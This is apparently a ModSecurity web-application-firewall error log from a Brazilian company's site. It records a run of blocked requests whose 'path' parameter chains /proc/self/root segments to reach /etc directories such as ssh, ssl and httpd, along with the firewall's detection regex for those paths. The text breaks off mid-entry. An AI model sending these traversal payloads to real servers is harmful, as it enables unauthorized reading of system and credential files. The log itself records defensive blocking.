"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF-9SswJuvopo3lOhTBQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:35.317694 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:52122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF-_9ocpUE4ed4uDzgigAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:36.474500 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.241.46:52132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF_HbQATo66fKoS7xAcAAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:37.686911 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:52134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF_dSswJuvopo3lOhTBgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:38.888007 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.241.46:33128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgF_hXjF1vJNtV6CWrsbAAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:41.243669 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:33144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGAdSswJuvopo3lOhTCQAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:42.542581 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.241.46:33148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGAhXjF1vJNtV6CWrsbQAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:44.760548 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:33156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGBLysWC90G-1nBrA4bQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:44.936467 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:39280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGBHjZBu2q05ozVU9IywAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:30:46.032001 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:33168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGBpqj1wV0Si-Okefc-wAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:48.231417 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:33172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGCJqj1wV0Si-OkefdAgAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:50.821287 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:35584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGCv9ocpUE4ed4uDzgjgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:52.146952 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.241.46:35594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGDHjZBu2q05ozVU9IzAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:53.288720 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:35596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGDQlT9VtDQc7bgUyfxgAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:55.994017 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.228.16:56114] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgGD46lpbStxTqkSktgxQAAAlY"]
[Mon Mar 16 10:30:58.399145 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:42864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGEpqj1wV0Si-OkefdCgAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:30:58.760916 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:35608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGEtSswJuvopo3lOhTEAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:00.108782 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:36114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGFHjZBu2q05ozVU9IzwAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:00.757938 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:50674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGFLysWC90G-1nBrA4dAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:01.287027 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:36116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGFf9ocpUE4ed4uDzgkAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:02.643318 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.241.46:36124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGFhXjF1vJNtV6CWrscQAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:08.729057 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:44190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGHJqj1wV0Si-OkefdFgAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:15.512926 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:36140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGI5qj1wV0Si-OkefdHQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:16.837922 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:34300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGJNSswJuvopo3lOhTEwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:17.994872 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:54552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 